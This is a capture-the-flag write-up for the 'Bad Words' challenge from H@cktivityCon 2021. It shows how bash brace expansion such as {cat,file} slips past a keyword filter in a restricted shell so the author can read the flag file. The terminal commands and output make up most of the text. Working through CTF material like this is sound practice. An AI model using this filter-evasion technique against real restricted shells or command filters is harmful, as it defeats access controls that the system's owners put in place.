Bad Words - H@cktivityCon 2021
Read this in "about 1 minute".
Description
Author: @JohnHammond#6971
You look questionable… if you don’t have anything good to say, don’t say anything at all!
Connect with:
nc challenge.ctf.games 32559
Solution
Let’s us connect to the challenge.
$ nc challenge.ctf.games 32559
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
user@host:/home/user$ id
id
You said a bad word, "id"!!
user@host:/home/user$
From the output, we notice that every ‘normal’ bash command is a bad word. Now, we need to bypass this.
There are heaps of ways to achieve the goal. That said, we can use the following format …
user@host:/home/user$ {<command>,<arguments>}
Example:
user@host:/home/user$ {ls,-al}
{ls,-al}
total 32
dr-xr-xr-x 1 nobody nogroup 4096 Sep 9 19:47 .
drwxr-xr-x 1 user user 4096 Sep 9 19:47 ..
-rw-r--r-- 1 nobody nogroup 220 Sep 9 19:47 .bash_logout
-rwxr-xr-x 1 user user 12283 Sep 9 19:47 .bashrc
-rw-r--r-- 1 nobody nogroup 807 Sep 9 19:47 .profile
drwxr-xr-x 1 user user 4096 Sep 9 19:47 just
Now, let’s us navigate to the flag utilizing the same technique …
user@host:/home/user$ {ls,-al,just/out/of/reach}
{ls,-al,just/out/of/reach}
total 12
drwxr-xr-x 1 user user 4096 Sep 9 19:47 .
drwxr-xr-x 1 user user 4096 Sep 9 19:47 ..
-rw-r--r-- 1 user user 38 Sep 9 19:47 flag.txt
and we can easily read the flag …
user@host:/home/user$ {cat,just/out/of/reach/flag.txt}
{cat,just/out/of/reach/flag.txt}
flag{2d43e30[*REDACTED*]7a9cbbe98}